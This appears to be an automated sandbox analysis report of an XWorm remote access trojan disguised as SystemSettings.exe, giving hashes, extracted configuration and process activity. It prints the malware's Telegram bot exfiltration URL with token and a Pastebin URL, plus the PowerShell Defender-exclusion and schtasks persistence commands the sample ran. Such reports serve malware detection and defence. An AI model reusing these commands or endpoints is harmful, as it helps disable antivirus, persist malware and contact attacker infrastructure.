Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    06/03/2025, 15:01

General

  • Target

    SystemSettings.exe

  • Size

    332KB

  • MD5

    701a94f53d54d38a11f4e60bc4f95b18

  • SHA1

    7413f5e4fc73eaf07d9d6cd67fc88fd40b70d9d0

  • SHA256

    9233d5872258aa674b015b57a4f37ca43a22524a682382cd88969cef135dacdb

  • SHA512

    4d63f155adbc5271fc82a263c4df29566ffbabb512ad2a7c73736969b29760bc0ae86e58f396907b8afa8791e8a8b042c895f94126a00da8c0b050e7ef343440

  • SSDEEP

    6144:6qXq7egSKNNO3BLZsgd8+f0Pn95maRWFjt:6qapSKNNOpZsgdQbmamjt

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

uoqo0jDHykn623lG

Attributes
  • Install_directory

    %Public%

  • install_file

    SystemSettings.exe

  • pastebin_url

    https://pastebin.com/raw/4zaiEtZS

  • telegram

    https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendMessage?chat_id=7537927256

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 41 IoCs
  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 43 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SystemSettings.exe
    "C:\Users\Admin\AppData\Local\Temp\SystemSettings.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SystemSettings.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemSettings.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3384
  • C:\Windows\System32\SystemSettings.exe
    "C:\Windows\System32\SystemSettings.exe"
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SystemSettings.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1168
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemSettings.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:4520
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\SystemSettings.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemSettings.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:4736
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemSettings" /tr "C:\Users\Public\SystemSettings.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1184
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} -Embedding
    1⤵
      PID:2648
    • C:\Windows\system32\mmc.exe
      "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
      1⤵
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      PID:3100
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3028

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SystemSettings.exe.log

      Filesize

      1KB

      MD5

      ebec742e1cbb74325a031bc4d3098d4a

      SHA1

      47dcd96d01fdba6128f12a98c2a0e5982fd33cfc

      SHA256

      4443a8e14d18d1c03b865eabfca6787ac6c523c1edef61809341a680c26b7080

      SHA512

      53480bad0abf1cb1389f25e9f01c133e3bdabf68254d98a83b722cd3523b4b95c0e38292e51be90e0860481462c805138b29a1d77d899401fa836e346d5f9dcf

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      3eb3833f769dd890afc295b977eab4b4

      SHA1

      e857649b037939602c72ad003e5d3698695f436f

      SHA256

      c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

      SHA512

      c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      f0f59cccd39a3694e0e6dfd44d0fa76d

      SHA1

      fccd7911d463041e1168431df8823e4c4ea387c1

      SHA256

      70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

      SHA512

      5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      be2ae72d79212963660019816bfb136f

      SHA1

      38b5416596063187785205e49585060163b6b078

      SHA256

      5daf94c9372343a2b1f524c44dd87863817011e1538bc56e2771e7f29ab81dcc

      SHA512

      f8e89bc7aa2f5afd246bb8cb5433033421cefb43a1949f3544c7778ed674cb9aa1f92227543afa2f364cf66b04c0855a9d1c85eb89cfba4ba112cff9c5c62297

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      517975ca7c83e8fcb5361ca5fc19e616

      SHA1

      593cf616c80c62f705505178166b07292739aeab

      SHA256

      841ec881828b64f21782f476cd17b58ac01eaa1910b95a9c7e58eb5780c74439

      SHA512

      2b711b28bec133ae40004c19597449625e87f2a5cce22569bb78f5d21e18c7bb873351371c1575ba8ea890caafa77ce9143d4237a46bdc606bbbd2a42be9a908

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      548f94fff5d24bde2d40f75b3174b9a8

      SHA1

      c55523794628e2e8c70ed6787c9a7e5fb2ff21b1

      SHA256

      d444f8a512e28eb1f2baa3231771b971030ffa940211b26c4a0c54f1b2053c46

      SHA512

      f6167facf286d204820c00a81b36d3da3143318233fa2ecebecabd934b1eca68443fe4ea09341ccc7c3c73b0986328909a86df23a807bc7f7d816c1b9114f4ae

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      2c29e0b132bc937ab311fb9ddec7e398

      SHA1

      d6fcfc55694bf40152877dca255fdf7086a4f38a

      SHA256

      a99bb45c15e7b13de98561fdae201b18b46b0d19731cc117f1428196d6016b0e

      SHA512

      7d5413eb70984a074c7d66cb3d5ab838dea7179aa84d9369036cdfcbc26afb78d9fb315fda9dfeb3e91e7e1fdb969689e3f48ecaa0e22eab42c2dbdf0182f741

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ei0z5yqn.v5u.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\System32\SystemSettings.exe

      Filesize

      332KB

      MD5

      701a94f53d54d38a11f4e60bc4f95b18

      SHA1

      7413f5e4fc73eaf07d9d6cd67fc88fd40b70d9d0

      SHA256

      9233d5872258aa674b015b57a4f37ca43a22524a682382cd88969cef135dacdb

      SHA512

      4d63f155adbc5271fc82a263c4df29566ffbabb512ad2a7c73736969b29760bc0ae86e58f396907b8afa8791e8a8b042c895f94126a00da8c0b050e7ef343440

    • memory/1252-0-0x00007FFDBEC43000-0x00007FFDBEC45000-memory.dmp

      Filesize

      8KB

    • memory/1252-40-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/1252-1-0x00000000005B0000-0x000000000060A000-memory.dmp

      Filesize

      360KB

    • memory/1252-34-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/2052-39-0x0000000002510000-0x000000000252E000-memory.dmp

      Filesize

      120KB

    • memory/2276-15-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/2276-19-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/2276-16-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/2276-14-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/2276-13-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/2276-12-0x00007FFDBEC40000-0x00007FFDBF702000-memory.dmp

      Filesize

      10.8MB

    • memory/2276-2-0x0000019594760000-0x0000019594782000-memory.dmp

      Filesize

      136KB

    • memory/3028-86-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-87-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-88-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-92-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-98-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-97-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-96-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-95-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-94-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB

    • memory/3028-93-0x000001F68AC20000-0x000001F68AC21000-memory.dmp

      Filesize

      4KB